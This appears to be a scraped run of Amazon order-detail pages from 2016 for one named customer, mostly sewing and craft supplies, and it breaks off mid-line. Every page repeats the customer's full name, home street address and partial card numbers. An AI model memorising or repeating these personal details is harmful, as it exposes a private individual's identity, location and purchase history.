Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-8577797-2700208 Order Placed: June 21, 2016 Amazon.com order number: 108-8577797-2700208 Order Total: $46.70 Shipped on June 21, 2016 Items Ordered Price 1 of: Sizzix Bigz BIGkick/Big Shot Die-Daisies Sold by: Amazon.com Services LLC $11.86 Condition: New 1 of: Sizzix 6 by 13.75-Inch Bigz Die by Tim Holtz, X-Large, Jumbo Tattered Florals Sold by: BuyBoxer (seller profile) $34.84 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $46.70 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $46.70 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$46.70 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-2839011-1629048 Order Placed: June 18, 2016 Amazon.com order number: 002-2839011-1629048 Order Total: $17.41 Shipped on June 20, 2016 Items Ordered Price 1 of: Swash 80240515 Pods Recharge Cups (12 Pack), Green Sold by: BudgetBeaters (seller profile) $11.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $11.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.42 Billing address Total before tax: $17.41 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$17.41 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-9836255-4405832 Order Placed: June 18, 2016 Amazon.com order number: 002-9836255-4405832 Order Total: $99.96 Shipped on June 20, 2016 Items Ordered 4 of: STEEL PANT STRETCHERS -SET OF 2 Sold by: DBROTH (seller profile) Price $24.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $99.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $99.96 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$99.96 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-0055961-7878601 Order Placed: June 18, 2016 Amazon.com order number: 002-0055961-7878601 Order Total: $33.64 Shipped on June 19, 2016 Items Ordered 2 of: Cosmos ® 6 Pack Antique Brass Metal No Sew Elastic Jeans Collar Button Pant Extender Sold by: Mo Aaron (seller profile) Condition: New Price $6.95 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on June 19, 2016 Items Ordered 1 of: 30-59" Solid Wood Pant Waist Stretcher -Instant Stretch Sold by: Blue Sky Mercantile (seller profile) Condition: New Price $19.74 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Print this page for your records. Payment Method: Item(s) Subtotal: $33.64 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $33.64 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$33.64 United States To view the status of your order, return to Order Summary. Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #002-3470435-7713846 Order Placed: June 18, 2016 Amazon.com order number: 002-3470435-7713846 Order Total: $12.49 Shipped on June 19, 2016 Items Ordered Price 1 of: Standard Propane Fuel Cylinder Sold by: Tenka1 (seller profile) $12.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $12.49 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $12.49 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$12.49 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-1835846-3533832 Order Placed: June 17, 2016 Amazon.com order number: 108-1835846-3533832 Order Total: $66.93 Shipped on June 17, 2016 Items Ordered Price 1 of: Buttons Galore Button Bonanza, Primary Sold by: Amazon.com Services LLC $6.17 Condition: New 1 of: PEPPERLONELY Brand 20PC Mixed Large 4 Hole Round Wood Buttons Scrapbooking Sewing Buttons 60mm (2-3/8 Inch) Sold by: PEPPERLONELY® (seller profile) $15.99 Condition: New 1 of: 3 Easy Fit Buttons for Jeans with Metal Button Sold by: Trenton Gifts (seller profile) $7.97 Condition: New 3 of: Dritz Looped Needle Threaders -6 Count Sold by: Amazon.com Services LLC $7.27 Condition: New 1 of: Roylco Really Big Buttons, 120 count Sold by: Made In USA Shop (seller profile) $14.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $66.93 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping : -$5.99 Billing address BRIAN J COADY Total before tax: $66.93 1454 MONROE ST NW Estimated tax to be collected: $0.00 WASHINGTON, DC 20010 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-0101951-5010650 Order Placed: June 17, 2016 Amazon.com order number: 108-0101951-5010650 Order Total: $7.50 Shipped on June 17, 2016 Items Ordered Price 1 of: YAKA 100pc New Thick Coconut Shell 2 Holes Button Craft /Sewing/hot Products Sold by: YAKA (seller profile) $7.50 Condition: New New Thick Coconut Shell 2 holes button craft /sewing/Hot Products Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $7.50 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $7.50 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$7.50 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-3752677-6421063 Order Placed: June 3, 2016 Amazon.com order number: 112-3752677-6421063 Order Total: $34.69 Shipped on June 4, 2016 Items Ordered Price 2 of: 99.9% Pure Dmso 8 fl oz Liquid Sold by: (seller profile) $14.35 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $28.70 MasterCard | Last digits: 9351 Shipping & Handling: $5.99 Billing address Total before tax: $34.69 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$34.69 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-0005631-3741800 Order Placed: April 21, 2016 Amazon.com order number: 116-0005631-3741800 Order Total: $54.71 Shipped on April 22, 2016 Items Ordered 1 of: Laser Marker 360° rotary head with tilt angle Sold by: MAKOTO CORP (seller profile) Price $13.78 Condition: New Laser Marker 1 of: Shirtmaking Techniques: with David Page Coffin, Coffin, David Page Sold by: Amazon.com Services LLC $19.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on April 21, 2016 Items Ordered 1 of: Simplicity Felting Machine Allen Wrenches Sold by: Amazon.com Services LLC Price $12.99 Condition: New 1 of: Janome Red Tip 5 Needle Pack Size 14 Sold by: World Weidner -Machine Embroidery Supplies (seller profile) $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Print this page for your records. Payment information Payment Method: Item(s) Subtotal: $54.71 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $54.71 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$54.71 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-9548183-8680227 Order Placed: April 13, 2016 Amazon.com order number: 115-9548183-8680227 Order Total: $17.78 Shipped on April 14, 2016 Items Ordered Price 1 of: Superior Thread Texture Magic 47"X18"-White Sold by: World Weidner -Machine Embroidery Supplies (seller profile) $11.96 Condition: New 1 of: 1 X Pattern Notcher Sold by: WEFOO (seller profile) $5.82 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $17.78 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $17.78 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$17.78 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-7624894-8702650 Order Placed: April 11, 2016 Amazon.com order number: 116-7624894-8702650 Order Total: $89.55 Shipped on April 13, 2016 Items Ordered 1 of: VIMVIP Mini DVI to VGA Adapter Cable for Macbook White Sold by: VIMVIP (seller profile) Price $11.99 Condition: New 1 of: Maxi-Lock Cone Thread 3000 Yards-Teal Green Sold by: Amazon.com Services LLC $5.11 Condition: New 4 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC $6.99 Condition: New 2 of: THREAD SPOOL HUGGERS, 'PEELS ...Keep Thread Tails Under Control' (12 Pieces). Prevents Thread Spools From Unwinding While in Storage or on Thread Rack Sold by: Smartneedle.inc (seller profile) $9.99 Condition: New 1 of: Maxi-Lock Stretch Thread 2,000 yds -#32599 Natural Sold by: World Weidner -Machine Embroidery Supplies (seller profile) $8.99 Condition: New 1 of: Neiko® 03044A 1/4-Drive Mini-size Ratcheting Screwdriver and Bit Set, Cr-V | Includes 7 Bits Sold by: Amazon.com Services LLC $8.72 Condition: New 1 of: Maxi-Lock Cone Thread 3000 Yards-Medium Navy Sold by: Amazon.com Services LLC $6.80 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Print this page for your records. Payment Method: Item(s) Subtotal: $89.55 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $89.55 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 United States Grand Total:$89.55 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #116-7119572-8551466 Order Placed: April 11, 2016 Amazon.com order number: 116-7119572-8551466 Order Total: $14.44 Shipped on April 18, 2016 Items Ordered Price 1 of: Maxi-Lock Serger Thread Straw Gold 44640 Sold by: -Supermart (seller profile) $6.39 Condition: New 1 of: Pellon Magic Fabric, 30" by 1 yd Sold by: -Supermart (seller profile) $8.05 Condition: New Brand New Products Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $14.44 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.44 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$14.44 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-6394700-1842621 Order Placed: April 11, 2016 Amazon.com order number: 116-6394700-1842621 Order Total: $6.48 Shipped on April 14, 2016 Items Ordered Price 1 of: Pellon SF101 Shape-Flex Woven Fusible Interfacing White Sold by: StitchinJeanie (seller profile) $6.48 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.48 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $6.48 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$6.48 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-0677604-3620221 Order Placed: April 11, 2016 Amazon.com order number: 116-0677604-3620221 Order Total: $10.74 Shipped on April 14, 2016 Items Ordered Price 1 of: Maxi-Lock Black Serger Thread, 3000 Yard Cone Sold by: ZipperStop (seller profile) $7.69 Condition: New Ships Same or Next Day from Zipperstop ZipperStop Wholesale Authorized Distributor of A & E 1 of: Cone Thread 3000 Yards-Chicory Sold by: ZipperStop (seller profile) $3.05 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $10.74 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $10.74 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$10.74 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-7245006-7187426 Order Placed: April 5, 2016 Amazon.com order number: 116-7245006-7187426 Order Total: $55.06 Shipped on April 5, 2016 Items Ordered Price 1 of: Monoprice Active Select Series High-Speed HDMI Cable 50 Feet with RedMere Technology Supports Ethernet, 3D, 4K and Audio Return -Black Sold by: Amazon.com Services LLC $55.06 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $55.06 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping : -$5.99 Billing address BRIAN J COADY Total before tax: $55.061454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$55.06 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-8749818-3899410 Order Placed: April 5, 2016 Amazon.com order number: 116-8749818-3899410 Order Total: $3.91 Shipped on April 7, 2016 Items Ordered Price 1 of: 1 Set of 6 Useful Leather Cloth Overstitch Wheel with Awl Tool Pin Sewing Punching Hole Maker Sold by: Click GO (seller profile) $3.91 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $3.91 MasterCard | Last digits: 5262 Shipping & Handling: $0.00 Billing address Total before tax: $3.91Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$3.91 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-3963909-1281851 Order Placed: April 5, 2016 Amazon.com order number: 116-3963909-1281851 Order Total: $9.99 Shipped on April 5, 2016 Items Ordered 1 of: One PATTERN NOTCHER DESIGNER 45N + One AWL + One Stitch Wheels Sold by: fujiyuan (seller profile) Price $9.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $9.99 MasterCard | Last digits: 5262 Shipping & Handling: $0.00 Billing address Total before tax: $9.99 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$9.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-2347495-9776201 Order Placed: April 4, 2016 Amazon.com order number: 116-2347495-9776201 Order Total: $16.95 Shipped on April 5, 2016 Items Ordered Price 1 of: C&E CNE50824 High-Speed HDMI Cable Supports Ethernet, 3D and Audio Return, 50-Feet Sold by: eDragon, Inc. (seller profile) $16.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $16.95 MasterCard | Last digits: 5262 Shipping & Handling: $0.00 Billing address Total before tax: $16.95Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$16.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #102-9972534-3349827 Order Placed: April 2, 2016 Amazon.com order number: 102-9972534-3349827 Order Total: $37.16 Shipped on April 4, 2016 Items Ordered Price 1 of: Olfa 28mm Rotary Blade Refill-10 per Package $16.43 Sold by: Good Price Japan on closing sale (seller profile) Condition: New Brand New. Unopened. These items will be shipped immediately by amazon.com FBA(Fulfillment by Amazon). Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Shipped on April 2, 2016 Items Ordered Price 1 of: Clover Rotary 18mm Blade Refill, 5 EA $12.75 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $29.18 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $7.98 ---- Billing address Total before tax: $37.16 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$37.16 United States To view the status of your order, return to Order Summary. Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-0477886-9067451 Order Placed: April 2, 2016 Amazon.com order number: 112-0477886-9067451 Order Total: $84.61 Shipped on April 2, 2016 Items Ordered 1 of: WORX WX081L ZipSnip Cutting Tool Sold by: Amazon.com Services LLC Price $34.99 Condition: New 1 of: Dritz Quilting Bamboo Point and Creaser Sold by: Amazon.com Services LLC $3.99 Condition: New 3 of: Universal Regular Point Overlock Needles-5/Pkg Sold by: Amazon.com Services LLC $7.28 Condition: New 3 of: Dritz Looped Needle Threaders -6 Count Sold by: Amazon.com Services LLC $6.29 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on April 2, 2016 Items Ordered 1 of: Clover Water Soluble Pencil Assortment, 3EA Sold by: Amazon.com Services LLC Price $4.92 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Print this page for your records. Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $84.61 MasterCard | Last digits: 5262 Shipping & Handling: $0.00 Billing address Total before tax: $84.61 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$84.61 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #105-8478145-2699428 Order Placed: March 12, 2016 Amazon.com order number: 105-8478145-2699428 Order Total: $235.49 Shipped on March 13, 2016 Items Ordered Price 1 of: Rowenta DG84 Pro Precision Steam Station with 400-Hole Stainless Steel $235.49 Soleplate, 1800-Watt Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $235.49 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $235.49Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$235.49 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-1097206-4517812 Order Placed: March 12, 2016 Amazon.com order number: 112-1097206-4517812 Order Total: $87.68 Shipped on March 12, 2016 Items Ordered 2 of: Clover Double Tracing Wheel Sold by: Amazon.com Services LLC Price $9.25 Condition: New 3 of: In-R-Form Unique Sew In Foam Stabilizer-18"X58" White 1/Pkg Model 492-18 Sold by: Amazon.com Services LLC $7.79 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on March 12, 2016 Items Ordered 1 of: Seawhisper pack of 70 pcs super wonder clips,alternative to pins for sewing quilting crafts Sold by: Sweet Goods (seller profile) Price $9.99 Condition: New 1 of: Clover Mini Iron II-The Adapter Set Sold by: Amazon.com Services LLC $40.97 Condition: New 1 of: Janome Front-Load -Fringe Foot Sold by: SewVacDirect (seller profile) | Product question? Ask Seller $14.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Print this page for your records. Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal:$107.82 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Gift Card Total before tax:$107.82 Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount: -$20.14 1454 Monroe St. NW Washington, DC 20010 Grand Total: $87.68United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-3342525-9081856 Order Placed: March 4, 2016 Amazon.com order number: 112-3342525-9081856 Order Total: $0.00 Shipped on March 6, 2016 Items Ordered 1 of: Dritz 674 Fray Check Liquid Seam Sealant, 0.75-Ounce Sold by: Amazon.com Services LLC Condition: New Price $2.99 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on March 5, 2016 Items Ordered 1 of: Dritz Looped Needle Threaders -6 Count Sold by: Amazon.com Services LLC Condition: New 2 of: Metallic Machine Needles-Size 12/80 5/Pkg Sold by: Amazon.com Services LLC Condition: New Price $6.29 $4.58 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on March 5, 2016 Print this page for your records. Items Ordered Price 1 of: White Male Fully Pinnable Mannequin Dress Form 38"33"40" on Maple Tripod Base (MSR) (Pinnable Series) Sold by: Only Mannequins® Outlet (seller profile) $59.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $77.44 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Gift Card Total before tax: $77.44Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$77.44 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-1407203-4466632 Order Placed: March 4, 2016 Amazon.com order number: 112-1407203-4466632 Seller's order number: 14701299 Order Total: $0.00 Shipped on March 7, 2016 Items Ordered Price 1 of: Euro-Notions Hemstitch Needle: Size 120 Sold by: SewingMachinesPlus (seller profile) $1.98 Condition: New No Hassle Returns -Usually Ships Same Business Day! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1.98 Debit Card | Last digits: 0079 Shipping & Handling: $3.00 Gift Card Total before tax: $4.98Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$4.98 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-0090605-0445005 Order Placed: March 4, 2016 Amazon.com order number: 112-0090605-0445005 Order Total: $0.00 Shipped on March 6, 2016 Items Ordered Price 1 of: Lead Ingots Sold by: Goliad Candle Co. (seller profile) $11.95 Condition: New The item up for sale is 5 Lbs of clean lead. It has been cast into 1/2 lb or 1 lb Lee ingots. Package GUARANTEED to be overweight. Will send out PRIORITY mail. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $11.95 Debit Card | Last digits: 0079 Shipping & Handling: $7.49 Gift Card Total before tax: $19.44Billing address Estimated tax to be collected: $0.00Brian Joseph Coady Gift Card Amount:-$19.44 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #105-7078824-8501826 Order Placed: February 28, 2016 Amazon.com order number: 105-7078824-8501826 Order Total: $360.98 Shipped on February 29, 2016 Items Ordered Price 1 of: Janome HD3000 Sewing Machine $348.99 Sold by: Bulgaru store (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $348.99 Debit Card | Last digits: 0079 Shipping & Handling: $11.99 Billing address Total before tax: $360.98 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$360.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-2710366-8203418 Order Placed: February 28, 2016 Amazon.com order number: 002-2710366-8203418 Order Total: $23.36 Shipped on March 1, 2016 Items Ordered Price 2 of: Clover Stack 'N Store Bobbin Tower with Nancy Zieman Sold by: Amazon.com Services LLC $11.68 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $23.36 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $23.36 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$23.36 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-6827453-9525854 Order Placed: February 26, 2016 Amazon.com order number: 002-6827453-9525854 Seller's order number: 4799949 Order Total: $0.00 Shipped on February 29, 2016 Items Ordered Price 1 of: Singer 67110blk 200 Yards Black Button Carpet Thread (Pack of 3) Sold by: Bargains N More (seller profile) $6.41 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.41 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $6.41Billing address Estimated tax to be collected: $0.00BRIAN J COADY Gift Card Amount:-$6.41 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-5852054-4238606 Order Placed: February 26, 2016 Amazon.com order number: 002-5852054-4238606 Order Total: $0.00 Shipped on February 27, 2016 Items Ordered Price 1 of: SODIAL-24 Assorted Colors Polyester Sewing Thread-Pack of 24 Sold by: Global Style-Ships From Hongkong (seller profile) $4.40 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $4.40 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $4.40Billing address Estimated tax to be collected: $0.00BRIAN J COADY Gift Card Amount:-$4.40 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-5136763-8012234 Order Placed: February 26, 2016 Amazon.com order number: 002-5136763-8012234 Order Total: $122.17 Shipped on February 26, 2016 Items Ordered 1 of: Sew-All Thread 273 Yards-Eggshell Sold by: Amazon.com Services LLC Price $5.50 Condition: New 1 of: Sew-All Thread 273 Yards-Cornsilk Sold by: Amazon.com Services LLC $6.93 Condition: New 1 of: Sulky Sampler 12wt Cotton Petites, Most Popular Assortment, 6-Pack Sold by: Amazon.com Services LLC $6.99 Condition: New 1 of: Sulky Sliver Metallic Thread for Sewing, 250 yd, Silver Sold by: Amazon.com Services LLC $6.98 Condition: New 1 of: Aurifil Mako Cotton Thread Solid, 1422 yd, White Sold by: Amazon.com Services LLC $10.97 Condition: New 1 of: Gutermann 26 Spool Thread Box Sold by: Shopitis (seller profile) $28.43 Condition: New Brand New! 1 of: Books by Hand Waxed Linen Thread Sold by: Amazon.com Services LLC $10.67 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 27, 2016 Print this page for your records. Items Ordered Price 1 of: SINGER All Purpose Polyester Thread, 150-Yard, Camel Sold by: Amazon.com Services LLC $4.52 Condition: New 1 of: Waxed Irish Linen Cord Bundle: Black, Chocolate Brown and Natural 1mm, 4 Ply, 